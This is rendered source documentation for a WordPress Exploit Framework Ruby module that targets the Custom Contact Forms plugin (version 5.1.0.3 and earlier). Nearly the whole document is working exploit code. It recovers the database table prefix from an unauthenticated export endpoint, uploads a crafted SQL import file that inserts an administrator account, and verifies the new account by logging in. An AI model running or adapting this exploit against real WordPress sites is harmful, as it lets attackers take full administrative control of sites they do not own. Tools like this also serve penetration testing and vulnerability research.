Class: Wpxf::Auxiliary::CustomContactFormsPrivilegeEscalation

Inherits:
Module
  • Object
Includes:
Wpxf, WordPress::Login
Defined in:
lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb


Constructor Details

#initialize ⇒ CustomContactFormsPrivilegeEscalation

Returns a new instance of CustomContactFormsPrivilegeEscalation.



# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 7

# Registers the module's metadata and the two options it needs.
#
# +username+ and +password+ default to random strings from
# +Utility::Text.rand_alpha+ so that two runs do not try to create the same
# account; the operator may override either before calling +run+.
def initialize
  super

  update_info(
    name: 'Custom Contact Forms Privilege Escalation',
    desc: 'The Custom Contact Forms plugin, up to and including version '\
          '5.1.0.3, allows unauthenticated users to create new admin users '\
          'due to lack of validation when uploading SQL files.',
    author: [
      'Marc-Alexandre Montpas', # Vulnerability discovery
      'rastating'               # WPXF module
    ],
    references: [
      ['URL', 'http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html'],
      ['URL', 'https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.3&old=997569&new_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.4&new=997569&sfp_email=&sfph_mail='],
      ['WPVDB', '7542']
    ],
    date: 'Aug 07 2014'
  )

  # Credentials for the administrator account the SQL import will create.
  username_option = StringOption.new(
    name: 'username',
    desc: 'The username to register with',
    default: Utility::Text.rand_alpha(10)
  )
  password_option = StringOption.new(
    name: 'password',
    desc: 'The password to register with',
    default: Utility::Text.rand_alpha(rand(10..20))
  )

  register_options([username_option, password_option])
end

Instance Method Details

#check ⇒ Object



# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 53

# Vulnerability check: fingerprints the plugin from its readme and compares
# the installed version against 5.1.0.4, the first release the module
# description treats as fixed.
def check
  plugin_slug = 'custom-contact-forms'
  fixed_in = '5.1.0.4'
  check_plugin_version_from_readme(plugin_slug, fixed_in)
end

#hashed_password ⇒ Object



# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 49

# MD5 digest of the +password+ option; +sql+ writes it straight into
# +user_pass+. NOTE(review): this relies on the target accepting a bare MD5
# value in +user_pass+ (WordPress' legacy hash format) — confirm the
# verification login still succeeds on the target's WordPress version.
def hashed_password
  plaintext = password
  Utility::Text.md5(plaintext)
end

#password ⇒ Object



# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 45

# Plaintext password from the +password+ option (random by default, see
# +initialize+); hashed by +hashed_password+ and used as-is by the
# verification login in +run+.
def password
  option_name = 'password'
  normalized_option_value(option_name)
end

#payload_body_builder(prefix) ⇒ Object



# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 82

# Builds the multipart body the plugin's import handler consumes: the
# attacker-controlled SQL as the +import_file+ upload plus the
# +ccf_merge_import+ flag that triggers the import.
#
# @param prefix [String] the target's table prefix, as recovered by +table_prefix+
# @return [Utility::BodyBuilder] the builder; the caller finalises it with +create+
def payload_body_builder(prefix)
  Utility::BodyBuilder.new.tap do |body|
    body.add_file_from_string('import_file', sql(prefix), sql_filename)
    body.add_field('ccf_merge_import', '1')
  end
end

#run ⇒ Object



# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 89

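# Runs the exploit: recovers the table prefix from the plugin's export
# endpoint, uploads an SQL "import" that inserts an administrator row, and
# then confirms the account by logging in with it.
#
# @return [Boolean] true only once the new administrator can authenticate
def run
  return false unless super

  emit_info 'Extracting table prefix...'
  prefix = table_prefix
  if prefix.nil?
    emit_error 'Unable to determine table prefix'
    return false
  end
  emit_success "Found table prefix: #{prefix}", true

  emit_info 'Creating new admin user...'
  res = nil
  payload_body_builder(prefix).create do |body|
    # The plugin answers a successful import with a redirect. Redirect
    # following is disabled for this one request so the 302 and its
    # Location header remain visible for the check below.
    scoped_option_change('follow_http_redirection', false) do
      res = execute_post_request(url: wordpress_url_admin_post, body: body)
    end
  end

  # Guard against the request never completing rather than raising
  # NoMethodError on nil below.
  if res.nil?
    emit_error 'Failed to create new user (no HTTP response)'
    return false
  end

  # Anything other than the plugin's own post-import redirect means the
  # import handler did not run as expected.
  if res.code != 302 || res.headers['Location'] != 'options-general.php?page=custom-contact-forms'
    emit_error 'Failed to create new user'
    emit_error "Code: #{res.code}", true
    emit_error "Location header: #{res.headers['Location']}", true
    return false
  end

  # The only proof the INSERTs landed is a successful login with the new
  # credentials (WordPress::Login#wordpress_login). The rendered listing
  # had lost the method name here, leaving `if (username, password)`,
  # which is not valid Ruby.
  emit_info 'Verifying new account...'
  if wordpress_login(username, password)
    emit_success "User #{username} with password #{password} successfully created"
    return true
  end

  emit_error 'Failed to create new user'
  false
end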

#sql(prefix) ⇒ Object



# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 71

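# SQL that the target imports to create the administrator: one row in
# +#{prefix}users+ plus the two +usermeta+ rows (administrator capability,
# +user_level+ 10) that grant the role.
#
# +username+ is operator input and is placed inside a MySQL string literal,
# so single quotes in it are doubled; a stray quote would otherwise break
# the statement and the import would silently do nothing. +hashed_password+
# is a hex digest and +prefix+ is captured from the target's own export, so
# neither is escaped here. Backslashes in the username are not escaped
# (their meaning depends on the server's SQL mode) — avoid them.
#
# @param prefix [String] the target's table prefix, including the trailing underscore
# @return [String] two INSERT statements, each newline terminated
def sql(prefix)
  login = username.gsub("'", "''")
  <<-END_OF_SQL
    INSERT INTO #{prefix}users (user_login, user_pass) VALUES ('#{login}','#{hashed_password}');
    INSERT INTO #{prefix}usermeta (user_id, meta_key, meta_value) VALUES ((select id from #{prefix}users where user_login='#{login}'),'#{prefix}capabilities','a:1:{s:13:"administrator";b:1;}'),((select id from #{prefix}users where user_login='#{login}'),'#{prefix}user_level','10');
  END_OF_SQL
end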

#sql_filename ⇒ Object



# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 78

# Filename given to the uploaded import file: a random five-letter stem
# with a +.sql+ extension.
def sql_filename
  stem = Utility::Text.rand_alpha(5)
  format('%s.sql', stem)
end

#table_prefix ⇒ Object



# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 57

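# Recovers the target's table prefix by asking the plugin's export handler
# (+ccf_export=1+ on admin-post.php) for its SQL dump and reading the
# prefix off the +customcontactforms_fields+ table name.
#
# The capture stops at the table name's opening backtick: the previous
# greedy +(.+_)+ could run from an earlier statement on the same line and
# return junk that contained a whole statement, which then ended up in
# the injected SQL.
#
# @return [String, nil] the prefix including its trailing underscore, or
#   nil when the export request fails, returns nothing, or does not
#   contain the expected table
def table_prefix
  res = execute_post_request(
    url: wordpress_url_admin_post,
    body: {
      'ccf_export' => '1'
    }
  )

  return nil if res.nil? || res.code != 200 || res.body.nil? || res.body.empty?

  match = res.body.match(/insert into `([^`]+_)customcontactforms_fields`/i)
  match && match[1]
end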

#username ⇒ Object



# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 41

# Login name from the +username+ option; +sql+ stores it in +user_login+
# and +run+ uses it for the verification login.
def username
  option_name = 'username'
  normalized_option_value(option_name)
end